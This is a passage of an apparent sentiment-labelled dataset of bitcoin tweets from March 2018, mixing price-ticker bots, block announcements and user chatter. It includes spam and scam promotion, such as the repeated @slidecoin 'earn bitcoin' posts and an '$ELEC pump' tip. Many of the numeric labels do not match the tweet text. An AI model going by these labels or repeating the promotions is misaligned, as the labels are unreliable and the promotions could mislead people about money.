Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:07:24 +0000 2018,"Fri Mar 23 04:07:13 2018 (3:55) +USD : 8412.55 +Wght: 0.42 +Blk#: 514756 +Size: 253.7 KB +TXs: 448 +Pool: 18 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:07:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:07:31 +0000 2018,"@Blockchain_Jay Bitcoin, Cardando, Ripple, EOS, BAT, NEO, Enjin, WAX.",0.0 +Fri Mar 23 03:07:52 +0000 2018,OMG Bitcoin is the new vaping,1.0 +Fri Mar 23 03:07:59 +0000 2018,New #bitcoin block 00000000000000000032e872239890eb7c362c008137845b7dcefbdb66a4e7ce mined at height 514756.,1.0 +Fri Mar 23 03:08:36 +0000 2018,$SANUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 03:09:12 +0000 2018,"fifth speaker @Satoshis_Vision @vermorel +Terabyte blocks :) + +""bandwidth is the most solved problem of #bitcoin.""",1.0 +Fri Mar 23 03:09:16 +0000 2018,Thank you to the @NODEfather for this opportunity and thank you to the bitcoin community for letting me be your champion.,0.0 +Fri Mar 23 03:09:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:09:59 +0000 2018,@charliebxrnes bitcoin,0.0 +Fri Mar 23 03:10:03 +0000 2018,"1 bitcoin = $8453.59 / 6861.356€ +1 bitcoin-cash = $972.231 / 789.111€ +1 ethereum = $517.53 / 420.054€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.453,590 +1 Hour: -2.02 % | 24 Hours: -6.81 % | 7 Days: 2.73 % +#btc #bitcoin",0.0 +Fri Mar 23 03:10:23 +0000 2018,@KingRippleXRP Bitcoin to $5000 soon,0.0 +Fri Mar 23 03:10:24 +0000 2018,@coindesk Binance doesn't even sell bitcoin for JPY...,0.0 +Fri Mar 23 03:10:25 +0000 2018,"fifth speaker @Satoshis_Vision @vermorel +Terabyte blocks :) + +""nowadays backing #bitcoin has improved, by quite a lot.""",1.0 +Fri Mar 23 03:10:33 +0000 2018,@GreedPositive @ThrowingBugs @Bitcoin Reported for abusing twitter to spread propaganda for BSCore.,-1.0 +Fri Mar 23 03:10:41 +0000 2018,@TechnicalCrypto That reinforces the argument to me that bitcoin should correlate.,0.0 +Fri Mar 23 03:10:53 +0000 2018,@SallyMayweather @theemrsmcafee This is why we need #bitcoin as well,0.0 +Fri Mar 23 03:11:11 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 03:11:14 +0000 2018,"@rogerkver @Falkvinge @Falkvinge is very clever. + +BCH is REAL bitcoin.",1.0 +Fri Mar 23 03:11:22 +0000 2018,Bitcoin value: $8413.86,0.0 +Fri Mar 23 03:11:45 +0000 2018,@AP4Liberty And sound money. Buy #bitcoin,1.0 +Fri Mar 23 03:11:48 +0000 2018,"@whalecalls +Should we get ready for round 2? +#bitcoin",0.0 +Fri Mar 23 03:12:03 +0000 2018,@BigCheds Anynews on bitcoin,0.0 +Fri Mar 23 03:12:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:12:51 +0000 2018,@RealKidPoker Bitcoin millionaire,0.0 +Fri Mar 23 03:13:18 +0000 2018,@CryptoWaffles damn liked this thinking you were joking about bitcoin,1.0 +Fri Mar 23 03:14:00 +0000 2018,Don't be such a bitcoin,0.0 +Fri Mar 23 03:14:06 +0000 2018,"The #Bitcoin pizza is worth $85,360,325 today. (-7% from yesterday)",1.0 +Fri Mar 23 03:14:12 +0000 2018,@Altcoinbuzzio Bitcoin hands down,-1.0 +Fri Mar 23 03:14:24 +0000 2018,@joerogan What about Bitcoin money???,0.0 +Fri Mar 23 03:14:32 +0000 2018,"Current Bitcoin Price = $9425.27 --- Includes Sum of Forks, Core $8402.00 (89.14%) + Cash $966.23 (10.25%) + Gold $57.04 (0.61%)",0.0 +Fri Mar 23 03:14:57 +0000 2018,@Apple Bitcoin.,0.0 +Fri Mar 23 03:15:02 +0000 2018,"The current price of Bitcoin is $8451.29. +The current price of BCash is $972.231, or 0.115678 BTC",0.0 +Fri Mar 23 03:15:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:15:54 +0000 2018,@mattmilsap @Bitcoin @Satoshi_N_ I really doubt if you are mocking #BCore altcoin supporters by doing so.,1.0 +Fri Mar 23 03:16:22 +0000 2018,"@sic_null @SpoonGuru21 @rogerkver @Falkvinge Nope, BTC stole Bitcoin",0.0 +Fri Mar 23 03:16:22 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:16:23 +0000 2018,@Altcoinbuzzio always bitcoin it does control the market. but Etherum or other powerful infrastructures like Neo,1.0 +Fri Mar 23 03:16:27 +0000 2018,Zuckerberg vs. the Winklevoss twins. Who’s the loser now? The identity seller or the billionaire bitcoin twins.,0.0 +Fri Mar 23 03:16:43 +0000 2018,In just 73 minutes a day you can reinvigorate your career. 
#bitcoin #clickbait,0.0 +Fri Mar 23 03:16:55 +0000 2018,"Fri Mar 23 04:16:23 2018 (9:10) +USD : 8407.42 +Wght: 0.42 +Blk#: 514757 +Size: 561.7 KB +TXs: 1016 +Pool: 61 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:17:02 +0000 2018,"Bitcoin Cash BCH Current Price: +$972,231 +1 Hour: -2.89 % | 24 Hours: -8.03 % | 7 Days: 4.92 % +#bch #bitcoin cash",0.0 +Fri Mar 23 03:17:11 +0000 2018,New #bitcoin block 000000000000000000366f5650d6ba3cf62682e44f541f9224004b8af7d25a5c mined at height 514757.,1.0 +Fri Mar 23 03:17:17 +0000 2018,Retweet if you agree that Bitcoin is the new gold #bitcoin #bitcoins #bitcoinisgold #bitcoinworld #bitcoinnews,1.0 +Fri Mar 23 03:17:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:17:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:17:32 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:18:00 +0000 2018,@Cryptos_Aus As long as it's not the fraudster bitcoin-fund-manager ?,-1.0 +Fri Mar 23 03:19:03 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:19:10 +0000 2018,New stable coin idea: Everything is priced in #bitcoin,1.0 +Fri Mar 23 03:20:01 +0000 2018,"BTC-HMQ AskRate: 0.00001119 #Bittrex #HMQ $HMQ #Humaniq #altcoin #crypto #bitcoin + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 03:20:03 +0000 2018,"1 bitcoin = $8440.05 / 6850.366€ +1 bitcoin-cash = $970.851 / 787.991€ +1 ethereum = $517.001 / 419.624€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:20:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:20:58 +0000 2018,Don't let the #Binance #FUD today distract you. 
#Bitcoin $BTC will bounce back.,0.0 +Fri Mar 23 03:21:17 +0000 2018,@syd_viciously Bitcoin was created by the CIA?,0.0 +Fri Mar 23 03:21:44 +0000 2018,Terabyte blocks - 50 txns a day for 10 billion people. Bitcoin can scale on chain. No layer 2 needed.,0.0 +Fri Mar 23 03:22:36 +0000 2018,"@RichardHeartWin However, bitcoin is going way lower regardless..",0.0 +Fri Mar 23 03:23:12 +0000 2018,"Whenever I contemplate whether or not to sell Bitcoin, I think of the ""Goodbye moon man"" song from Rick and Morty.",0.0 +Fri Mar 23 03:23:49 +0000 2018,Bitcoin is barely even fun anymore. $XBT BTC,1.0 +Fri Mar 23 03:24:21 +0000 2018,@CoinStructive #shirtgate Hey @ellypriZeMaN we need you more than ever. ~Bitcoin Belle 🌷,1.0 +Fri Mar 23 03:24:42 +0000 2018,@LandlordRescue I’m inventing a better bitcoin so should be good to go!,1.0 +Fri Mar 23 03:25:29 +0000 2018,"@LoganPaul watch out for the death cross in ur bitcoin investment ,look it up check it out protect ur money",0.0 +Fri Mar 23 03:25:56 +0000 2018,"Dow Jones going down. +Bitcoin was supposed to shield. +Fucking suits- leave us! + +$BTC #crypto #haiku",-1.0 +Fri Mar 23 03:26:04 +0000 2018,our uber driver has his business card on the dash and it says “bitcoin miner” as his job title,0.0 +Fri Mar 23 03:26:23 +0000 2018,@ProfFaustus Bitcoin is not a philosophy...... BCH is not Bitcoin.,0.0 +Fri Mar 23 03:26:24 +0000 2018,@itsmelissabrown remember how early they were on writing about bitcoin??? nuts in retrospect,1.0 +Fri Mar 23 03:26:32 +0000 2018,"@JakeNTech New options: +1. Water Cooled Laptop, WetCoin™! +2. Two Computa, Two BitCoin!",1.0 +Fri Mar 23 03:27:05 +0000 2018,All in on Diet Bitcoin. Escobars brother guarantees profit lol,1.0 +Fri Mar 23 03:27:06 +0000 2018,"50k tokens reserved for private investors + +#Ethereum #ZOMBI #ZOMBIcoin #Bitcoin #ICO",0.0 +Fri Mar 23 03:27:09 +0000 2018,"The Thrive Labs Team is launching a revolutionary Premium Decentralized Advertising Marketplace. 
+#thrive #ico #ethereum #bitcoin",0.0 +Fri Mar 23 03:27:11 +0000 2018,"I hate ween people exploit things and ruin the fun for everyone. First Youtube, now bitcoin/cryptos 😧😧",-1.0 +Fri Mar 23 03:27:33 +0000 2018,I see all the Bitcoin ppl stopped talkin 😭,0.0 +Fri Mar 23 03:28:55 +0000 2018,wat if unified Korea becomes the next cuba & disrupts global power um Bitcoin n stuff,0.0 +Fri Mar 23 03:29:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:30:02 +0000 2018,"Bitcoin:$8431.5 +Ethereum:$515.604 +Bitcoin Cash:$966.799 +Litecoin:$158.548 +Ripple:$0.631444 +IOTA:$1.26867",0.0 +Fri Mar 23 03:30:03 +0000 2018,"1 bitcoin = $8431.5 / 6843.426€ +1 bitcoin-cash = $966.799 / 784.702€ +1 ethereum = $515.604 / 418.489€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:30:03 +0000 2018,One Bitcoin now worth $8413.81@bitstamp. High $9055.330. Low $8342.000. Market Cap $142.481 Billion #bitcoin,1.0 +Fri Mar 23 03:30:03 +0000 2018,One Bitcoin now worth $8413.81@bitstamp. High $9055.330. Low $8342.000. Market Cap $142.481 Billion #bitcoin,1.0 +Fri Mar 23 03:30:10 +0000 2018,@welovefaucet I have the same problem in both We Love Bitcoin and Play Bitcoin.,1.0 +Fri Mar 23 03:30:22 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 03:30:26 +0000 2018,#SUB Price is 0.00004617 (-0.00000073) #BTC / 0.385999 (-0.00771) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:27 +0000 2018,Bitcoin>>>>>,0.0 +Fri Mar 23 03:30:27 +0000 2018,#EOS Price is 0.00078017 (-0.00000340) #BTC / 6.52226 (-0.06538) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:28 +0000 2018,#XEM Price is 0.00003301 (-0.00000028) #BTC / 0.275969 (-0.00347) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:29 +0000 2018,#ADA Price is 0.00002258 (-0.00000009) #BTC / 0.188787 (-0.00178) #USD. Market rank is 6. 
#cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:29 +0000 2018,#DASH Price is 0.0481372 (+0.00093950) #BTC / 402.431 (+5.62700) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:45 +0000 2018,This couple loves bitcoin so much that they decided to have a bitcoin themed wedding. Most of their guests gave them bitcoin as a gift!,1.0 +Fri Mar 23 03:31:15 +0000 2018,"Hello humans, #Bitcoin is currently around $8428.55 as of Thu Mar 22 22:31:11 CDT 2018",0.0 +Fri Mar 23 03:31:23 +0000 2018,Bitcoin value: $8430.81,0.0 +Fri Mar 23 03:31:45 +0000 2018,@Altcoinbuzzio Bitcoin still. I've been stockpiling and putting it in my bot to make daily scalping trades,0.0 +Fri Mar 23 03:31:49 +0000 2018,@lister_lester He wants to buy the bitcoin dip. : ),1.0 +Fri Mar 23 03:32:03 +0000 2018,@Alfredo_THC make bitcoin and the dow go back up,0.0 +Fri Mar 23 03:32:32 +0000 2018,"The short way was to help, Google and Facebook went for the money. Plan B, just go through you🔥 + +#bitcoin",0.0 +Fri Mar 23 03:32:36 +0000 2018,@CNBC Would be nice to see an after Pic when bitcoin crashes,1.0 +Fri Mar 23 03:32:57 +0000 2018,"Fri Mar 23 04:32:12 2018 (15:49) +USD : 8416.59 +Wght: 0.42 +Blk#: 514758 +Size: 736.0 KB +TXs: 1658 +Pool: 75 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:33:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:33:26 +0000 2018,New #bitcoin block 00000000000000000004d1d76f3a8931d87ad736d36fd62c733e05cf56d9274e mined at height 514758.,1.0 +Fri Mar 23 03:33:42 +0000 2018,So @Ania_Nimbla you like #Bitcoin & #Crypto Cool 👍🏻 Great to connect Ania much appreciated,1.0 +Fri Mar 23 03:34:00 +0000 2018,"@afaqshah @PhilakoneCrypto Wishing ill upon bitcoin, rude",-1.0 +Fri Mar 23 03:34:35 +0000 2018,#bitcoin buy now 8387 good price for enter,1.0 +Fri Mar 23 03:34:50 +0000 2018,@EstherKuKu Then redeem your points for Bitcoin and boom goes the dynamite!,0.0 +Fri Mar 23 03:36:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:36:13 +0000 2018,@CNBC How much are they worth in bitcoin?,1.0 +Fri Mar 23 03:36:19 +0000 2018,@Ginkgo_tree_Kr @rogerkver @Falkvinge Bitcoin is not a philosophy. BCH is not Bitcoin.,0.0 +Fri Mar 23 03:36:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:36:48 +0000 2018,I really look forward to bitcoin being large enough that these whales can't fuck with the price so much.,1.0 +Fri Mar 23 03:36:53 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:37:15 +0000 2018,Bitcoin 4k by July 🤑🤑🤑🤑,0.0 +Fri Mar 23 03:38:08 +0000 2018,Lil Bitcoin #newgenerationrapnames,0.0 +Fri Mar 23 03:38:12 +0000 2018,"$ELEC Pump detected, in 5 days we will see + 500% on this baby! Very hot inside news are coming! #bitcoin #altcoin #eth $eth $xmr $btc",1.0 +Fri Mar 23 03:38:22 +0000 2018,@lopp @coindesk Better bitcoin resource:,1.0 +Fri Mar 23 03:38:42 +0000 2018,@bitstein By this logic what is work?? Trading??? 
Every diehard hodler I know works to better bitcoin for free.,1.0 +Fri Mar 23 03:38:54 +0000 2018,Since /r/buttcoin is actually one of the oldest bitcoin subs around we were in the top 3 I think for a few years,1.0 +Fri Mar 23 03:39:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:39:25 +0000 2018,"BTC,ETH,ETC,LTC,BCH,MONA +Please send someone virtual currency  +#Bitcoin #VirtualCurrency",0.0 +Fri Mar 23 03:39:46 +0000 2018,@bitcoinyuri @badger_coin Looks nice...makes me wanna buy some $BTC #Bitcoin !,0.0 +Fri Mar 23 03:39:53 +0000 2018,"@CNBC (2932331 follows) +This couple loves bitcoin so much that they decided to have a bitcoin themed wedding. Most of their guests gave...",1.0 +Fri Mar 23 03:39:54 +0000 2018,@lopp Better bitcoin resource:,1.0 +Fri Mar 23 03:40:04 +0000 2018,"1 bitcoin = $8441.65 / 6851.665€ +1 bitcoin-cash = $970.165 / 787.434€ +1 ethereum = $515.2 / 418.162€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:40:32 +0000 2018,"""We have elected to put our money and faith in a mathematical framework that is free of politics and human error."" Tyler Winklevoss #bitcoin",1.0 +Fri Mar 23 03:40:45 +0000 2018,@SommerRay do you like bitcoin?,0.0 +Fri Mar 23 03:40:46 +0000 2018,"It's hard to make a good TA in ALTS if the market is being moved by $btc. So, let's keep following The King. $btcusd $crypto #bitcoin",1.0 +Fri Mar 23 03:41:14 +0000 2018,@nachdermas buy bitcoin,0.0 +Fri Mar 23 03:41:21 +0000 2018,:( :( ....[Bitcoin performance assessment (-0.18%)] #bitcoin,-1.0 +Fri Mar 23 03:42:03 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 03:42:20 +0000 2018,@NoahRobertson01 glad i never bought into the bitcoin hype,1.0 +Fri Mar 23 03:43:00 +0000 2018,"Ever wanted to experiment with bitcoin? 
Send some to this address, yo:1BFaVmv91jmxSZDkiNedw1kt56m4X5bpRm",0.0 +Fri Mar 23 03:43:09 +0000 2018,#Bitcoin is all of the beautiful poetry you read but failed to understand.,1.0 +Fri Mar 23 03:43:16 +0000 2018,@thealexwolfe @LockedOnKnicks You'd better run that ish like a bitcoin mining facility. It's like 0.00000:p000o.O0013 cents per stream... 😭,1.0 +Fri Mar 23 03:43:16 +0000 2018,"💯💯💯 great dealEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:43:39 +0000 2018,@C1TY_0F_FL1NT @chadxenu @BigTiddiePolice You'll have to pay me 1 bitcoin,0.0 +Fri Mar 23 03:43:41 +0000 2018,"#bitcoin next 1 hour high low range potential + +Low 8343 +High 8623",1.0 +Fri Mar 23 03:44:14 +0000 2018,@crypt0snews Bitcoin can be wiped out if the authorities prove it as a counterfeit like a 3 dollar fake bill....,-1.0 +Fri Mar 23 03:44:16 +0000 2018,I really just sent 300 to the wrong bitcoin address.. wow.. fml,-1.0 +Fri Mar 23 03:44:36 +0000 2018,"@DJSweetBrush @ericgeller Unless it's money laundering through Bitcoin. Could be anything, though lots of big names involved.",0.0 +Fri Mar 23 03:44:51 +0000 2018,"DO-NOT short Bitcoin, you will get crushed + +Sub 0.050 Eth/Btc is possible",-1.0 +Fri Mar 23 03:44:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:45:05 +0000 2018,IMHO bitcoin is the worst!! 🌙,-1.0 +Fri Mar 23 03:45:15 +0000 2018,Earn bitcoin disini,0.0 +Fri Mar 23 03:45:15 +0000 2018,"#Moneto is a loan service, through which users can get real money on the security of Bitcoin and almost instantly.",1.0 +Fri Mar 23 03:45:47 +0000 2018,@MichaelMyers @Bitcoin @blockchain This feels like a reach.,0.0 +Fri Mar 23 03:46:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:47:11 +0000 2018,"#MONETO will provide an opportunity to take a loan on the security of Bitcoin immediately, comfortably and reliably as possible.",1.0 +Fri Mar 23 03:47:13 +0000 2018,Might be risky. But it is time to go long on #xbtusd. Go #bitcoin,-1.0 +Fri Mar 23 03:47:18 +0000 2018,Including bitcoin/altcoins,0.0 +Fri Mar 23 03:47:27 +0000 2018,"""Old man yells at Bitcoin"" is exactly the same pattern as: + +""The Church yells at Darwin for claiming that man was not created by god""",1.0 +Fri Mar 23 03:47:30 +0000 2018,@Snowden Post more bitcoin FUD please.,1.0 +Fri Mar 23 03:47:32 +0000 2018,"What does ""altcoin"" mean? $crypto #bitcoin",-1.0 +Fri Mar 23 03:47:47 +0000 2018,"old: ""man, i wish i had bought bitcoin back then!"" +new: ""man, i wish i had sold bitcoin back then!""",1.0 +Fri Mar 23 03:47:48 +0000 2018,@BradyDale @coindesk @Snowden @blockstack @WolfieZhao I also think this as one of the biggest endorsements for Bitcoin indirectly,0.0 +Fri Mar 23 03:47:54 +0000 2018,"#Moneto will provide an opportunity to take a loan on the security of Bitcoin as quickly, conveniently and safely as possible.",1.0 +Fri Mar 23 03:48:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:48:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:48:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:49:13 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8406 / €6816 / £5956 @ Block 514758. +Market Cap: 145.52B USD. 
#Bitcoin #Market",0.0 +Fri Mar 23 03:49:17 +0000 2018,@QuestForTori A Smart app that lets you mine for bitcoin while you order dominos,1.0 +Fri Mar 23 03:49:47 +0000 2018,@Sicarious_ A trading tool for more Bitcoin.,1.0 +Fri Mar 23 03:50:02 +0000 2018,A poet without love were a physical and metaphysical impossibility. #JohnKeats #bitcoin,1.0 +Fri Mar 23 03:50:03 +0000 2018,"1 bitcoin = $8458.96 / 6865.714€ +1 bitcoin-cash = $973.827 / 790.406€ +1 ethereum = $517.184 / 419.773€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:50:13 +0000 2018,"@ninthcompanion This is literally my thoughts exactly + +but nah its a way to mine bitcoin",1.0 +Fri Mar 23 03:50:15 +0000 2018,"#MONETO is a loan service, allowing users will be able to receive real money on the security of Bitcoin and almost immediately.",1.0 +Fri Mar 23 03:50:20 +0000 2018,@CandyHeartsBand fun fact: u can sell them on the black market in exchange for bitcoin,1.0 +Fri Mar 23 03:50:23 +0000 2018,@joenatividad Uh oh. Hope you don’t have to buy a new one. Damn bitcoin miners ruin everything,1.0 +Fri Mar 23 03:50:59 +0000 2018,"What % of the time does fundamental ""FUD"" show up to justify a technical dump? #Bitcoin #Ethereum #cryptocurrency",0.0 +Fri Mar 23 03:51:08 +0000 2018,@DonCryptoLife @CatoshiK @rogerkver Roger Ver was not associated with the creation of Bitcoin Cash,0.0 +Fri Mar 23 03:51:24 +0000 2018,Bitcoin value: $8420.77,0.0 +Fri Mar 23 03:51:42 +0000 2018,@PhilakoneCrypto You're not trading it for Bitcoin now? 
🤑,0.0 +Fri Mar 23 03:52:06 +0000 2018,"Join the #FlightToSafety #NoTariffs + +#bitcoin #litecoin #bitcoincash #investing #fintech #stockmarkets",0.0 +Fri Mar 23 03:52:18 +0000 2018,@MaddowBlog @MSNBC right no the city of atlanta computer system has been Hacked and their asking for 51000 in bitcoin,1.0 +Fri Mar 23 03:52:24 +0000 2018,crazy thought: that guy who bought bitcoin at $0.08 and sold it at $0.30 made more money than anyone who bought in December,-1.0 +Fri Mar 23 03:52:40 +0000 2018,@witsureisquick No bitcoin in existence can amount to the worth my followers are.,1.0 +Fri Mar 23 03:52:55 +0000 2018,"@shillycrypto Present: ""I wish I had sold Bitcoin right now!""",1.0 +Fri Mar 23 03:53:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:53:20 +0000 2018,@LeNuitRenard @LordRapt0rJesus @Dunnestar @ProfFaustus Do you hodl bitcoin?,0.0 +Fri Mar 23 03:53:32 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:53:52 +0000 2018,"@MarkYusko Good, bad, indifferent, you’re the only serious investor I know as bullish on bitcoin",-1.0 +Fri Mar 23 03:53:57 +0000 2018,"Dutch Court Finds Bitcoin A Legitimate “Transferable Value”: A Dutch court ruled BTC a “transferable value”, which…",0.0 +Fri Mar 23 03:53:59 +0000 2018,"Fri Mar 23 04:53:03 2018 (20:51) +USD : 8393.36 +Wght: 0.42 +Blk#: 514759 +Size: 1062.6 KB +TXs: 2146 +Pool: 96 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:54:01 +0000 2018,@NotJustin11 Honestly have no clue how to get bitcoin 😂,1.0 +Fri Mar 23 03:54:13 +0000 2018,look on youtube for the purchase of crypto#FLOGmall#blockchain#bitcoin#btc#etherum#ico,0.0 +Fri Mar 23 03:54:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:54:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:54:29 +0000 2018,"Fri Mar 23 04:54:12 2018 (1:09) +USD : 8393.36 +Wght: 0.42 +Blk#: 514760 +Size: 64.4 KB +TXs: 129 +Pool: 39 (0.0 MB) +@dellisny +#bitcoin",0.0 +Fri Mar 23 03:54:32 +0000 2018,@sashandiggers @aantonop @farantzos LN is presumably a 100% trusted intermediary between Me and the Bitcoin Ledger,0.0 +Fri Mar 23 03:54:37 +0000 2018,@CRInvestor @ErikSTownsend You know what he thinks about bitcoin right?,1.0 +Fri Mar 23 03:54:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:54:42 +0000 2018,New #bitcoin block 000000000000000000110c6088b447cd0e9eca66d321b19218027aa5a2fba391 mined at height 514759.,1.0 +Fri Mar 23 03:54:46 +0000 2018,New #bitcoin block 00000000000000000021c74f60ebbe8111e38b6a6d14b91d918ec68a9cab17f1 mined at height 514760.,1.0 +Fri Mar 23 03:54:48 +0000 2018,New #bitcoin block 000000000000000000414d2134cf429c8a8ee667dbe1ff76a32ea809068114aa mined at height 514761.,1.0 +Fri Mar 23 03:55:00 +0000 2018,"Fri Mar 23 04:54:29 2018 (0:17) +USD : 8394.66 +Wght: 0.42 +Blk#: 514761 +Size: 9.9 KB +TXs: 26 +Pool: 75 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:55:00 +0000 2018,"@WeTrustPlatform @el33th4xor Thanks! We are indeed the first #bitcoin nonprofit, est. 2013 🙌🏾",1.0 +Fri Mar 23 03:55:16 +0000 2018,"4661dbbb251658a2a2e9422ddd5eb7a1e189fb2532812454edb443b07e55beb9/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 03:56:21 +0000 2018,#Ilovebitcoin because there are no legal issues with using #bitcoin everywhere,-1.0 +Fri Mar 23 03:56:35 +0000 2018,@emcgillivray @ncweaver @random_walker Bitcoin is not equal to blockchain,0.0 +Fri Mar 23 03:57:07 +0000 2018,"@_Kevin_Pham Although were #AdamSmith around today he might call it an #InvisibleVirtualHand. + +#cryptocurrency #blockchain #bitcoin $BTC",0.0 +Fri Mar 23 03:57:18 +0000 2018,"semangat mengumpulkan bitcoin, Earn bitcoin on a daily basis! + +1. 
Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:57:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:58:08 +0000 2018,I feel like most of the stock drops are because of amerixan owned bitcoin owners though,1.0 +Fri Mar 23 03:58:20 +0000 2018,Current price of Bitcoin is $8419.00 #Bitcoin #Bithound,0.0 +Fri Mar 23 03:58:57 +0000 2018,I think because of the law in america....it is definetly hurting american bitcoin owners compared to in eu vs korea,0.0 +Fri Mar 23 03:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30399.00000000 | BITCOIN(BLCHAIN) R$27878.6590054 | LITECOIN(MCDTBC) R$576.80000000,0.0 +Fri Mar 23 03:59:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:59:14 +0000 2018,We need a bounce here or these next few weeks are gonna be ugly... $BTCUSD #bitcoin,-1.0 +Fri Mar 23 03:59:57 +0000 2018,Which will launch first? $crypto #bitcoin,1.0 +Fri Mar 23 04:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8413.21 USD = 1 BTC",-1.0 +Fri Mar 23 04:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,444.11, market cap of $142,996,569,692 (44.33%), and 24 hr vol. 
